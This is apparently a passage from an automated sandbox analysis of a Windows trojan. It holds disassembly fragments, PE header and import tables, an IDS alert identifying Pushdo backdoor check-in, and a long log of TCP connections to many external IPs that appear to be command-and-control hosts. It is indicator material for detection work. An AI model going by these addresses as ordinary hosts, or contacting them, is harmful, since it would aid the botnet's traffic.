                                                                                                                                                                                                                                                                    rcr ebx, 1
                                                                                                                                                                                                                                                                    shr edx, 1
                                                                                                                                                                                                                                                                    rcr eax, 1
                                                                                                                                                                                                                                                                    or ecx, ecx
                                                                                                                                                                                                                                                                    jne 00007F8050C3CD26h
                                                                                                                                                                                                                                                                    div ebx
                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5aac40x28.rdata
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x1e0.rsrc
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xa10000x1750.reloc
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x59ef00x1c.rdata
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x59f100x40.rdata
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x190000x134.rdata
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                    .text0x10000x17f2b0x18000False0.5643208821614584data6.597156253943545IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                    .rdata0x190000x4219e0x42200False0.9165177516540642data7.69665778448415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                    .data0x5c0000x42a580x42000False0.7373342803030303data5.901059325521838IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                    .gfids0x9f0000xd00x200False0.318359375data1.8685085242841921IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                    .rsrc0xa00000x1e00x200False0.525390625data4.692060940173397IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                    .reloc0xa10000x17500x1800False0.802734375data6.619951716720241IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                    RT_MANIFEST0xa00600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                                    KERNEL32.dllCreateFileA, CloseHandle, GetCommandLineA, GetCurrentActCtx, FindFirstFileA, FindNextFileA, GetModuleFileNameA, GetModuleHandleA, GetCurrentProcessId, ReadFile, CreateFileMappingA, ExitProcess, VirtualAlloc, CreateMutexA, ReleaseMutex, MultiByteToWideChar, WideCharToMultiByte, SetHandleInformation, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStringTypeW, GetLastError, SetLastError, GetCurrentThreadId, GetACP, EncodePointer, DecodePointer, HeapAlloc, HeapFree, GetModuleHandleW, GetProcAddress, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, FreeLibrary, LoadLibraryExW, LCMapStringW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, IsValidCodePage, GetOEMCP, GetCPInfo, GetModuleHandleExW, GetProcessHeap, RaiseException, HeapSize, HeapReAlloc, GetStartupInfoW, QueryPerformanceCounter, InitializeSListHead, RtlUnwind, GetStdHandle, WriteFile, GetModuleFileNameW, FindClose, FindFirstFileExW, FindNextFileW, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                    192.168.2.4188.114.97.749682802016867 07/27/23-21:42:53.737718TCP2016867ET TROJAN Backdoor.Win32.Pushdo.s Checkin4968280192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.720208883 CEST4968280192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.720257998 CEST4968380192.168.2.4137.118.26.67
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.720350027 CEST4968480192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.726082087 CEST4968580192.168.2.480.93.82.33
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.733544111 CEST4968680192.168.2.4104.21.23.9
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.737162113 CEST8049682188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.737302065 CEST4968280192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.737718105 CEST4968280192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.739811897 CEST8049684192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.739968061 CEST4968480192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.740222931 CEST4968480192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.749973059 CEST8049686104.21.23.9192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.750154972 CEST4968680192.168.2.4104.21.23.9
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.750500917 CEST4968680192.168.2.4104.21.23.9
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.754226923 CEST8049682188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.758955956 CEST8049684192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.759200096 CEST8049684192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.759320974 CEST4968480192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.759593964 CEST804968580.93.82.33192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.759695053 CEST4968580192.168.2.480.93.82.33
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.760245085 CEST4968580192.168.2.480.93.82.33
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.767556906 CEST8049686104.21.23.9192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.778325081 CEST8049686104.21.23.9192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.780997038 CEST4968480192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.781016111 CEST4968680192.168.2.4104.21.23.9
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.793941021 CEST804968580.93.82.33192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.796094894 CEST4968580192.168.2.480.93.82.33
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.800355911 CEST8049684192.124.249.20192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.800678015 CEST4968480192.168.2.4192.124.249.20
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.842330933 CEST4968780192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.845607996 CEST8049682188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.845825911 CEST4968280192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.877918959 CEST4968580192.168.2.480.93.82.33
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.878535986 CEST4968880192.168.2.470.39.251.249
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.878540039 CEST4968980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.878603935 CEST4968280192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.897155046 CEST8049682188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.912038088 CEST804968580.93.82.33192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.912111998 CEST4968580192.168.2.480.93.82.33
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.953095913 CEST4969080192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.953954935 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.954081059 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.969990015 CEST8049690104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.970074892 CEST4969080192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.982222080 CEST804968870.39.251.249192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.982350111 CEST4968880192.168.2.470.39.251.249
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.982397079 CEST804968734.205.242.146192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.982567072 CEST4968780192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.992132902 CEST8049682188.114.97.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:53.992240906 CEST4968280192.168.2.4188.114.97.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.062808037 CEST4969080192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.062860012 CEST4968780192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.062932968 CEST4968880192.168.2.470.39.251.249
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.079468966 CEST8049690104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.088555098 CEST4969380192.168.2.434.149.87.45
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.100881100 CEST8049690104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.100948095 CEST8049690104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.100980043 CEST8049690104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.101000071 CEST4969080192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.101047039 CEST8049690104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.101062059 CEST4969080192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.101062059 CEST4969080192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.101093054 CEST8049690104.26.7.221192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.101139069 CEST4969080192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.101166010 CEST4969080192.168.2.4104.26.7.221
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.111778975 CEST804969334.149.87.45192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.111886978 CEST4969380192.168.2.434.149.87.45
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.137176991 CEST8049689206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.140036106 CEST4968980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.161724091 CEST4969380192.168.2.434.149.87.45
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.162023067 CEST4968980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.166723967 CEST804968870.39.251.249192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.168078899 CEST804968870.39.251.249192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.168157101 CEST4968880192.168.2.470.39.251.249
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.185012102 CEST804969334.149.87.45192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.192846060 CEST4968880192.168.2.470.39.251.249
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.202136040 CEST804968734.205.242.146192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.202183962 CEST804968734.205.242.146192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.202281952 CEST4968780192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.203288078 CEST4968780192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.219813108 CEST804969334.149.87.45192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.219960928 CEST4969380192.168.2.434.149.87.45
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.229821920 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.229928017 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.234313965 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.236056089 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.244360924 CEST4969480192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.251918077 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.251966000 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.269491911 CEST4969580192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.271528959 CEST4969680192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.276366949 CEST8049694213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.276506901 CEST4969480192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.276896000 CEST4969480192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.287839890 CEST8049696188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.287982941 CEST4969680192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.290354967 CEST4969680192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.297343969 CEST804968870.39.251.249192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.297440052 CEST4968880192.168.2.470.39.251.249
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.306617022 CEST8049696188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.312449932 CEST8049694213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.312506914 CEST8049694213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.312556028 CEST8049694213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.312645912 CEST4969480192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.312666893 CEST8049694213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.312736988 CEST4969480192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.312763929 CEST8049694213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.312812090 CEST4969480192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.312832117 CEST4969480192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.312870026 CEST8049694213.186.33.17192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.312985897 CEST4969480192.168.2.4213.186.33.17
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.317202091 CEST8049696188.114.96.7192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.317409039 CEST4969680192.168.2.4188.114.96.7
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.342536926 CEST804968734.205.242.146192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.409392118 CEST804969534.205.242.146192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.410621881 CEST4969580192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.420653105 CEST8049689206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.420814991 CEST8049689206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.420854092 CEST8049689206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.420921087 CEST4968980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.420972109 CEST8049689206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.420974016 CEST4968980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.421042919 CEST4968980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.434051037 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.434796095 CEST4969580192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.436528921 CEST4969880192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.437222004 CEST4968980192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.450479984 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.450659037 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.471535921 CEST804969862.122.190.121192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.471683025 CEST4969880192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.474500895 CEST4969780192.168.2.4104.26.15.53
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.490848064 CEST8049697104.26.15.53192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.496510983 CEST4969880192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.504483938 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527661085 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527726889 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527765036 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527776003 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527810097 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527810097 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527826071 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527842045 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527849913 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527870893 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527899027 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527925968 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527947903 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527968884 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527968884 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.527976990 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.528023005 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.528040886 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.531157970 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.531383991 CEST804969862.122.190.121192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.533139944 CEST804969862.122.190.121192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.533200026 CEST4969880192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.551670074 CEST4969880192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556541920 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556569099 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556595087 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556605101 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556619883 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556627035 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556636095 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556643963 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556657076 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556679010 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556679964 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556714058 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556713104 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556729078 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556741953 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556754112 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556754112 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556771040 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556786060 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.556803942 CEST4969280192.168.2.4118.27.125.181
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.573910952 CEST804969534.205.242.146192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.573967934 CEST804969534.205.242.146192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.574022055 CEST4969580192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.574162006 CEST4969580192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.574621916 CEST4969580192.168.2.434.205.242.146
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.587399960 CEST804969862.122.190.121192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.587645054 CEST4969880192.168.2.462.122.190.121
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.613929987 CEST4969980192.168.2.4172.217.16.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.636961937 CEST8049699172.217.16.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.637073994 CEST4969980192.168.2.4172.217.16.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.666393042 CEST4969980192.168.2.4172.217.16.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.667586088 CEST4970080192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.689270973 CEST8049699172.217.16.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.695813894 CEST8049689206.191.152.37192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.715826988 CEST4970180192.168.2.4206.191.152.37
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.745919943 CEST4970280192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.765614986 CEST804970280.74.154.6192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.765791893 CEST4970280192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.766519070 CEST4970280192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.769166946 CEST8049700192.241.158.94192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.769337893 CEST4970080192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.769795895 CEST4970080192.168.2.4192.241.158.94
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.786196947 CEST804970280.74.154.6192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.786247969 CEST804970280.74.154.6192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.786401033 CEST4970280192.168.2.480.74.154.6
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.787940025 CEST8049699172.217.16.179192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.788065910 CEST4969980192.168.2.4172.217.16.179
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.802555084 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.802603960 CEST804969159.106.19.204192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.802725077 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.802788973 CEST4969180192.168.2.459.106.19.204
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.835889101 CEST8049692118.27.125.181192.168.2.4
                                                                                                                                                                                                                                                                    Jul 27, 2023 21:42:54.835933924 CEST8049692118.27.125.181192.168.2.4
